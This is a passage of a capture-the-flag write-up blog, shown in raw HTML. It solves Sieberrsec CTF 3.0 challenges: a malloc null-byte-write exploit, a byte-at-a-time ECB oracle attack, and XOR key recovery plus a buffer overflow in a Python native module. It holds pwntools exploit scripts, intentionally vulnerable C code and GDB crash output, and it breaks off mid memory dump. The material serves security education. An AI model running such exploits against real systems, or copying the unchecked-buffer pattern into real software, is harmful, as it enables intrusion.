class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'challs.sieberrsec.tech'</span><span class="p">,</span> <span class="mi">1470</span><span class="p">)</span> <span class="c1"># Get the leaked address. </span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Leak: '</span><span class="p">)</span> <span class="n">leak</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Leaked Address: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">leak</span><span class="p">)))</span> <span class="c1"># Send the size of the leaked address to write a zero at it. </span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Allocating {} bytes.'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">leak</span><span class="p">))</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">leak</span><span class="p">).</span><span class="n">encode</span><span class="p">())</span> <span class="c1"># Send a bogus message. </span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Enter your message: '</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Sending bogus message'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'amon'</span><span class="p">)</span> <span class="c1"># Get the flag. </span> <span class="n">flag</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="s">'Flag: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">flag</span><span class="p">.</span><span class="n">decode</span><span class="p">()))</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>Running the script gives us the flag:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python exploit.py <span class="go">[+] Opening connection to challs.sieberrsec.tech on port 1470: Done [*] Leaked Address: 0x55f3fd5952a0 [*] Allocating 94506415903392 bytes. [*] Sending bogus message [+] Flag: IRS{Y0U_4R3_4W350M3_CJAVFSHA} [*] Closed connection to challs.sieberrsec.tech port 1470 </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">IRS{Y0U_4R3_4W350M3_CJAVFSHA}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: Control of the size parameter to malloc and a subsequent lack of checking that the returned pointer is not 0 leads to an arbitrary null byte write to sensitive addresses such as a global variable. This variable is then used in a check condition to allow the printing of a flag.

2021-12-28T00:00:00+08:002021-12-28T00:00:00+08:00https://nandynarwhals.org/sieberrsec-ctf-3.0-totallyfoolproofcrypto<p>Summary: Standard byte-by-byte ECB oracle decryption.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>totallyfoolproofcrypto Cryptography Solves (7) - 884 Points In hindsight, rolling my own crypto was a rather stupendous stroke of stupidity. I'll be switching to a well-known, verified library to fix this. from Crypto.Util.Padding import pad,unpad from Crypto.Cipher import AES import os with open("flag", 'rb') as f: flag = f.read().strip() key = os.urandom(16) while 1: pt = input('&gt; ').encode() padded = pad(pt+flag, AES.block_size) cipher = AES.new(key, AES.MODE_ECB) print(cipher.encrypt(padded).hex()) nc challs.sieberrsec.tech 31311 A first blood prize of one (1) month of Discord Nitro is available for this challenge. Some amount of "bruteforce" will be necessary -- and hence legal -- for this challenge. </code></pre></div></div> <h2 id="solution">Solution</h2> <p>This challenge is a pretty standard byte-by-byte ECB oracle challenge. For an illustrated writeup, please see this <a href="https://c0nradsc0rner.com/2016/07/03/ecb-byte-at-a-time/">excellent article</a> by c0nrad.</p> <p>First, let’s identify the maximum possible number of blocks comprising the flag. We can do this by sending an empty prefix and getting a sample encrypted output.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nc challs.sieberrsec.tech 31311 </span><span class="gp">&gt;</span><span class="w"> </span><span class="go">d4037cd10db2222f01cf737f8f08353c7879f5d8932dfea5916d8ea68e943681b5eed8d24350b43ae5c1be9f26e58b90 </span><span class="gp">&gt;</span><span class="w"> </span></code></pre></div></div> <p>Some quick math tells us that the likely number of blocks is 3.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">In [243]: len('d4037cd10db2222f01cf737f8f08353c7879f5d8932dfea5916d8ea68e943681b5eed8d24350b43ae5c1be9f26e58b90')/2/16 Out[243]: 3.0 </span></code></pre></div></div> <p>We can start off with an initial trial of <code class="language-plaintext highlighter-rouge">A</code> characters of length <code class="language-plaintext highlighter-rouge">3 * 16</code> and iterating through possible candidates (restricted to just a subset of printable bytes) to obtain the flag byte-by-byte with the following script:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="kn">import</span> <span class="nn">string</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="c1"># context.log_level = 'debug' </span> <span class="n">max_blocks</span> <span class="o">=</span> <span class="mi">3</span> <span class="n">block_size</span> <span class="o">=</span> <span class="mi">16</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'challs.sieberrsec.tech'</span><span class="p">,</span> <span class="mi">31311</span><span class="p">)</span> <span class="n">max_size_secret</span> <span class="o">=</span> <span class="n">max_blocks</span> <span class="o">*</span> <span class="n">block_size</span> <span class="n">secret</span> <span class="o">=</span> <span class="sa">b</span><span class="s">''</span> <span class="k">for</span> <span class="n">size</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">((</span><span class="n">max_size_secret</span> <span class="o">-</span> <span class="mi">1</span><span class="p">),</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">):</span> <span class="c1"># Original </span> <span class="n">origin</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="n">size</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">origin</span><span class="p">)</span> <span class="n">original_blocks</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span> <span class="n">tmp</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="n">size</span> <span class="o">+</span> <span class="n">secret</span> <span class="k">for</span> <span class="n">character</span> <span class="ow">in</span> <span class="n">string</span><span class="p">.</span><span class="n">printable</span><span class="p">[:</span><span class="mi">95</span><span class="p">]:</span> <span class="n">cur_line</span> <span class="o">=</span> <span class="n">tmp</span> <span class="o">+</span> <span class="n">character</span><span class="p">.</span><span class="n">encode</span><span class="p">()</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cur_line</span><span class="p">)</span> <span class="n">candidate_blocks</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span> <span class="k">if</span> <span class="n">original_blocks</span><span class="p">[:</span><span class="n">max_size_secret</span> <span class="o">*</span> <span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="n">candidate_blocks</span><span class="p">[:</span><span class="n">max_size_secret</span> <span class="o">*</span> <span class="mi">2</span><span class="p">]:</span> <span class="n">secret</span> <span class="o">+=</span> <span class="n">character</span><span class="p">.</span><span class="n">encode</span><span class="p">()</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'{}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">secret</span><span class="p">.</span><span class="n">decode</span><span class="p">()))</span> <span class="k">break</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">secret</span><span class="p">)</span> <span class="o">+</span> <span class="n">size</span> <span class="o">&lt;=</span> <span class="n">max_size_secret</span> <span class="o">-</span> <span class="mi">1</span><span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="s">'Flag: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">secret</span><span class="p">.</span><span class="n">decode</span><span class="p">()))</span> <span class="k">return</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>Running the script gives us the flag:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python solve.py <span class="go">[+] Opening connection to challs.sieberrsec.tech on port 31311: Done [*] I [*] IR [*] IRS [*] IRS{ [*] IRS{w [*] IRS{w0 [*] IRS{w0w [*] IRS{w0w_ [*] IRS{w0w_w [*] IRS{w0w_wh [*] IRS{w0w_wh@ [*] IRS{w0w_wh@t [*] IRS{w0w_wh@t_ [*] IRS{w0w_wh@t_a [*] IRS{w0w_wh@t_an [*] IRS{w0w_wh@t_an_ [*] IRS{w0w_wh@t_an_0 [*] IRS{w0w_wh@t_an_0r [*] IRS{w0w_wh@t_an_0ri [*] IRS{w0w_wh@t_an_0rig [*] IRS{w0w_wh@t_an_0rig1 [*] IRS{w0w_wh@t_an_0rig1n [*] IRS{w0w_wh@t_an_0rig1na [*] IRS{w0w_wh@t_an_0rig1nal [*] IRS{w0w_wh@t_an_0rig1nal_ [*] IRS{w0w_wh@t_an_0rig1nal_p [*] IRS{w0w_wh@t_an_0rig1nal_pr [*] IRS{w0w_wh@t_an_0rig1nal_pr0 [*] IRS{w0w_wh@t_an_0rig1nal_pr0b [*] IRS{w0w_wh@t_an_0rig1nal_pr0bl [*] IRS{w0w_wh@t_an_0rig1nal_pr0bl3 [*] IRS{w0w_wh@t_an_0rig1nal_pr0bl3m [*] IRS{w0w_wh@t_an_0rig1nal_pr0bl3m} [+] Flag: IRS{w0w_wh@t_an_0rig1nal_pr0bl3m} </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">IRS{w0w_wh@t_an_0rig1nal_pr0bl3m}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: Standard byte-by-byte ECB oracle decryption.

2021-12-28T00:00:00+08:002021-12-28T00:00:00+08:00https://nandynarwhals.org/sieberrsec-ctf-3.0-turbofastcrypto<p>Summary: An insecurely implemented Python native library allows for an attacker to exfiltrate the XOR key used to ‘encrypt’ arbitrary data as well as contains an unbounded buffer overflow on the encryption buffer allowing partial overwrite of the <code class="language-plaintext highlighter-rouge">ml_meth</code> pointer of a <code class="language-plaintext highlighter-rouge">PyMethodDef</code> structure to trigger a win function.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <p>Part 1:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Turbo</span> <span class="n">Fast</span> <span class="n">Crypto</span><span class="p">,</span> <span class="n">part</span> <span class="mi">1</span> <span class="n">Cryptography</span> <span class="n">Solves</span> <span class="p">(</span><span class="mi">29</span><span class="p">)</span> <span class="o">-</span> <span class="mi">117</span> <span class="n">Points</span> <span class="n">We</span> <span class="n">found</span> <span class="n">the</span> <span class="n">frontend</span> <span class="n">code</span> <span class="k">for</span> <span class="n">a</span> <span class="n">remote</span> <span class="n">encryption</span> <span class="n">service</span> <span class="n">at</span> <span class="n">nc</span> <span class="n">challs</span><span class="p">.</span><span class="n">sieberrsec</span><span class="p">.</span><span class="n">tech</span> <span class="mi">3477</span><span class="p">:</span> <span class="kn">import</span> <span class="nn">turbofastcrypto</span> <span class="c1"># The source code for this module is only available for part 2 of this challenge :) </span><span class="k">while</span> <span class="mi">1</span><span class="p">:</span> <span class="n">plaintext</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">ciphertext</span> <span class="o">=</span> <span class="n">turbofastcrypto</span><span class="p">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">plaintext</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Encrypted: '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">))</span> <span class="n">My</span> <span class="n">partner</span> <span class="n">says</span> <span class="n">it</span> <span class="n">operates</span> <span class="n">under</span> <span class="n">the</span> <span class="n">hood</span> <span class="k">with</span> <span class="s">"XOR"</span><span class="p">,</span> <span class="n">whatever</span> <span class="n">that</span> <span class="n">means</span><span class="p">.</span> <span class="n">I</span> <span class="n">need</span> <span class="n">you</span> <span class="n">to</span> <span class="n">recover</span> <span class="n">the</span> <span class="n">key</span><span class="p">.</span> </code></pre></div></div> <p>Part 2:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Turbo Fast Crypto, part 2 Binary Exploitation Solves (1) - 900 Points Using the key you extracted, we found a link to the source code for turbofastcrypto. There happens to be a secret flag file on the server, and you need to extract it. A first blood prize of one (1) month of Discord Nitro is available for this challenge. (the target server is the same as part 1) </code></pre></div></div> <p>Attachment: <a href="https://nandynarwhals.org/assets/files/sieberrsec3.0/tfc.tar.gz">challenge file</a></p> <h2 id="solution">Solution</h2> <h3 id="part-1">Part 1</h3> <p>From the Python source given in the part 1 prompt, an unknown library is imported and used to encrypt some user supplied string. Since the clue that XOR is used, we can get a sample and decrypt it with our known plaintext to get the key.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nc challs.sieberrsec.tech 3477 </span><span class="gp">&gt;</span><span class="w"> </span>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span class="gp">Encrypted: b'\x08\x13\x12:2$</span><span class="s2">"3</span><span class="nv">$52</span><span class="se">\x</span><span class="s2">1e 3</span><span class="nv">$\</span><span class="s2">x1e3</span><span class="nv">$7$ </span><span class="s2">-</span><span class="nv">$%</span><span class="sb">``</span><span class="s2">&lt;AAAAAAAAAAAAAAAA' </span></code></pre></div></div> <p>Decrypting it:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">In [227]: xor(b'\x08\x13\x12:2$</span><span class="s2">"3</span><span class="nv">$52</span><span class="se">\x</span><span class="s2">1e 3</span><span class="nv">$\</span><span class="s2">x1e3</span><span class="nv">$7$ </span><span class="s2">-</span><span class="nv">$%</span><span class="sb">``</span><span class="s2">&lt;AAAAAAAAAAAAAAAA', b'A') </span><span class="go">Out[227]: b'IRS{secrets_are_revealed!!}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' </span></code></pre></div></div> <p>Playing with the application a little foreshadows the next part a little when it demonstrates some odd stateful behaviour when sending multiple strings:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nc challs.sieberrsec.tech 3477 </span><span class="gp">&gt;</span><span class="w"> </span>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span class="gp">Encrypted: b'\x08\x13\x12:2$</span><span class="s2">"3</span><span class="nv">$52</span><span class="se">\x</span><span class="s2">1e 3</span><span class="nv">$\</span><span class="s2">x1e3</span><span class="nv">$7$ </span><span class="s2">-</span><span class="nv">$%</span><span class="sb">``</span><span class="s2">&lt;AAAAAAAAAAAAAAAA' </span><span class="gp">&gt;</span><span class="w"> </span><span class="s2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA </span><span class="go">Encrypted: b'IRS{secrets_are_revealed!!}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' </span><span class="gp">&gt;</span><span class="w"> </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">IRS{secrets_are_revealed!!}</code></p> <h3 id="part-2">Part 2</h3> <p>Unpacking the provided tar file yields the source code to the previous part including a Python native module.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>file tfc.tar.gz <span class="go">tfc.tar.gz: gzip compressed data, from Unix, original size modulo 2^32 51200 </span><span class="gp">$</span><span class="w"> </span><span class="nb">tar </span>xvf tfc.tar.gz <span class="go">x distrib_turbofastcrypto/ x distrib_turbofastcrypto/README.md x distrib_turbofastcrypto/tfc.py x distrib_turbofastcrypto/compile.sh x distrib_turbofastcrypto/setup.py x distrib_turbofastcrypto/checksums.txt x distrib_turbofastcrypto/turbofastcrypto.cpython-38-x86_64-linux-gnu.so x distrib_turbofastcrypto/turbofastcrypto.c </span></code></pre></div></div> <p>Examining the <code class="language-plaintext highlighter-rouge">tfc.py</code> script confirms that this is the ‘frontend’ we dealt with previously. Thus, we should focus on the <code class="language-plaintext highlighter-rouge">turbofastcrypto</code> library instead.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">turbofastcrypto</span> <span class="c1"># The source code for this module is only available for part 2 of this challenge :) </span><span class="k">while</span> <span class="mi">1</span><span class="p">:</span> <span class="n">plaintext</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">ciphertext</span> <span class="o">=</span> <span class="n">turbofastcrypto</span><span class="p">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">plaintext</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Encrypted: '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">))</span> </code></pre></div></div> <p>We are given the compiled <code class="language-plaintext highlighter-rouge">turbofastcrypto.cpython-38-x86_64-linux-gnu.so</code> shared object and the source code to it. It appears to implement a simple XOR cryptography operation using a fixed sized buffer called <code class="language-plaintext highlighter-rouge">IV</code> containing the flag in part 1. It also contains the <code class="language-plaintext highlighter-rouge">print_flag</code> function which we are supposed to call somehow.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define PY_SSIZE_T_CLEAN #include &lt;Python.h&gt; </span> <span class="kt">char</span> <span class="n">IV</span><span class="p">[</span><span class="mi">64</span><span class="p">]</span> <span class="o">=</span> <span class="s">"IRS{secrets_are_revealed!!}"</span><span class="p">;</span> <span class="cp">#pragma GCC optimize ("O0") </span><span class="n">__attribute__</span> <span class="p">((</span><span class="n">used</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">print_flag</span><span class="p">()</span> <span class="p">{</span> <span class="n">system</span><span class="p">(</span><span class="s">"cat flag"</span><span class="p">);</span> <span class="p">}</span> <span class="k">static</span> <span class="n">PyObject</span> <span class="o">*</span><span class="nf">encrypt</span><span class="p">(</span><span class="n">PyObject</span> <span class="o">*</span><span class="n">self</span><span class="p">,</span> <span class="n">PyObject</span> <span class="o">*</span><span class="n">args</span><span class="p">)</span> <span class="p">{</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">cmd</span><span class="p">;</span> <span class="n">Py_ssize_t</span> <span class="n">len</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">PyArg_ParseTuple</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="s">"s#"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">cmd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">len</span><span class="p">))</span> <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">len</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="n">IV</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^=</span> <span class="n">cmd</span><span class="p">[</span><span class="n">i</span><span class="p">];</span> <span class="k">return</span> <span class="n">PyBytes_FromStringAndSize</span><span class="p">(</span><span class="n">IV</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span> <span class="p">}</span> <span class="k">static</span> <span class="n">PyMethodDef</span> <span class="n">mtds</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="p">{</span><span class="s">"encrypt"</span><span class="p">,</span> <span class="n">encrypt</span><span class="p">,</span> <span class="n">METH_VARARGS</span><span class="p">,</span> <span class="s">"Encrypt a string"</span> <span class="p">},</span> <span class="p">{</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span> <span class="p">}</span> <span class="p">};</span> <span class="k">static</span> <span class="k">struct</span> <span class="n">PyModuleDef</span> <span class="n">moddef</span> <span class="o">=</span> <span class="p">{</span> <span class="n">PyModuleDef_HEAD_INIT</span><span class="p">,</span> <span class="s">"turbofastcrypto"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">mtds</span> <span class="p">};</span> <span class="n">PyMODINIT_FUNC</span> <span class="nf">PyInit_turbofastcrypto</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="n">PyModule_Create</span><span class="p">(</span><span class="o">&amp;</span><span class="n">moddef</span><span class="p">);}</span> </code></pre></div></div> <p>One obvious issue with the code is that the length of the user input obtained through <code class="language-plaintext highlighter-rouge">input()</code> is not validated against the size of the buffer, thus we can overflow it and corrupt the structures following it. We can start an instance of the script to debug it in GDB to observe what the memory layout looks like and see if we can produce a crash.</p> <p>First, we can attach to an instance and create a DeBrujin sequence pattern.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ pattern create 500 [+] Generating a pattern of 500 bytes (n=8) aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa </span><span class="gp">[+] Saved as '$</span>_gef3<span class="s1">' </span><span class="go">gef➤ </span></code></pre></div></div> <p>Next, submitting it to the program and allowing it to run results in a crash at when attempting to call into <code class="language-plaintext highlighter-rouge">0x6261616161616162</code>.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ c Continuing. Program received signal SIGSEGV, Segmentation fault. </span><span class="gp">module_traverse (m=0x7fc7c719fc70, visit=0x54f930 &lt;visit_decref&gt;</span>, <span class="nv">arg</span><span class="o">=</span>0x7fc7c719fc70<span class="o">)</span> at Objects/moduleobject.c:775 <span class="go">775 Objects/moduleobject.c: No such file or directory. [ Legend: Modified register | Code | Heap | Stack | String ] ─────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── </span><span class="gp">$</span>rax : 0x6261616161616162 <span class="o">(</span><span class="s2">"baaaaaab"</span>?<span class="o">)</span> <span class="gp">$</span>rbx : 0x00007fc7c719fc70 → 0x0000000000000004 <span class="gp">$</span>rcx : 0x00007fc7c72ce058 → 0xff07ff04ff05ffff <span class="c">... </span><span class="go">───────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── </span><span class="gp"> 0x474286 &lt;module_traverse+22&gt;</span><span class="w"> </span>mov rax, QWORD PTR <span class="o">[</span>rax+0x50] <span class="gp"> 0x47428a &lt;module_traverse+26&gt;</span><span class="w"> </span><span class="nb">test </span>rax, rax <span class="gp"> 0x47428d &lt;module_traverse+29&gt;</span><span class="w"> </span>je 0x474295 &lt;module_traverse+37&gt; <span class="gp"> → 0x47428f &lt;module_traverse+31&gt;</span><span class="w"> </span>call rax <span class="gp"> 0x474291 &lt;module_traverse+33&gt;</span><span class="w"> </span><span class="nb">test </span>eax, eax <span class="gp"> 0x474293 &lt;module_traverse+35&gt;</span><span class="w"> </span>jne 0x4742b0 &lt;module_traverse+64&gt; <span class="gp"> 0x474295 &lt;module_traverse+37&gt;</span><span class="w"> </span>mov rdi, QWORD PTR <span class="o">[</span>rbx+0x10] <span class="gp"> 0x474299 &lt;module_traverse+41&gt;</span><span class="w"> </span>xor eax, eax <span class="gp"> 0x47429b &lt;module_traverse+43&gt;</span><span class="w"> </span><span class="nb">test </span>rdi, rdi <span class="go">───────────────────────────────────────────────────────────────────────────────────────────────────── arguments (guessed) ──── *0x6261616161616162 ( ) ───────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── </span><span class="gp">[#</span>0] Id 1, Name: <span class="s2">"python"</span>, stopped 0x47428f <span class="k">in </span>module_traverse <span class="o">()</span>, reason: SIGSEGV <span class="go">─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── </span><span class="gp">[#</span>0] 0x47428f → module_traverse<span class="o">(</span><span class="nv">m</span><span class="o">=</span>0x7fc7c719fc70, <span class="nv">visit</span><span class="o">=</span>0x54f930 &lt;visit_decref&gt;, <span class="nv">arg</span><span class="o">=</span>0x7fc7c719fc70<span class="o">)</span> <span class="gp">[#</span>1] 0x550256 → subtract_refs<span class="o">(</span><span class="nv">containers</span><span class="o">=</span>&lt;optimized out&gt;<span class="o">)</span> <span class="gp">[#</span>2] 0x550256 → collect<span class="o">(</span><span class="nv">generation</span><span class="o">=</span>0x2, <span class="nv">n_collected</span><span class="o">=</span>0x7ffe16255f78, <span class="nv">n_uncollectable</span><span class="o">=</span>0x7ffe16255f80, <span class="nv">nofail</span><span class="o">=</span>0x0, <span class="nv">state</span><span class="o">=</span>&lt;optimized out&gt;<span class="o">)</span> <span class="gp">[#</span>3] 0x551673 → collect_with_callback<span class="o">(</span><span class="nv">state</span><span class="o">=</span>&lt;optimized out&gt;, <span class="nv">generation</span><span class="o">=</span>0x2<span class="o">)</span> <span class="gp">[#</span>4] 0x551673 → PyGC_Collect<span class="o">()</span> <span class="gp">[#</span>5] 0x551673 → _PyGC_CollectIfEnabled<span class="o">()</span> <span class="gp">[#</span>6] 0x524937 → Py_FinalizeEx<span class="o">()</span> <span class="gp">[#</span>7] 0x5262c5 → Py_FinalizeEx<span class="o">()</span> <span class="gp">[#</span>8] 0x42cb9b → Py_RunMain<span class="o">()</span> <span class="gp">[#</span>9] 0x42d574 → pymain_main<span class="o">(</span><span class="nv">args</span><span class="o">=</span>0x7ffe162560d0<span class="o">)</span> <span class="go">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef➤ </span></code></pre></div></div> <p>This translates to an offset of 208. Thus, we can possibly obtain RIP control through a standard buffer overflow.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ pattern offset 0x6261616161616162 [+] Searching for '0x6261616161616162' [+] Found at offset 208 (little-endian search) likely [+] Found at offset 208 (big-endian search) gef➤ </span></code></pre></div></div> <p>However, we have to deal with ASLR now. Our goal is to obtain the base address of the shared object so we can calculate the absolute address of <code class="language-plaintext highlighter-rouge">print_flag</code>. We break on the <code class="language-plaintext highlighter-rouge">encrypt</code> function to observe if we can utilise the functionality to leak some addresses.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ br encrypt Breakpoint 1 at 0x7fc7c820d1c0: file turbofastcrypto.c, line 9. gef➤ c Continuing. Breakpoint 1, encrypt (self=0x7fc7c719fc70, args=0x7fc7c7266910) at turbofastcrypto.c:9 9 static PyObject *encrypt(PyObject *self, PyObject *args) { </span><span class="c">... </span></code></pre></div></div> <p>Examining the memory starting from the <code class="language-plaintext highlighter-rouge">IV</code> buffer shows that there appears to be pointers contained within the <code class="language-plaintext highlighter-rouge">mtds</code> structure.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ x/32xg IV </span><span class="gp">0x7fdc26804060 &lt;IV&gt;</span>: 0x726365737b535249 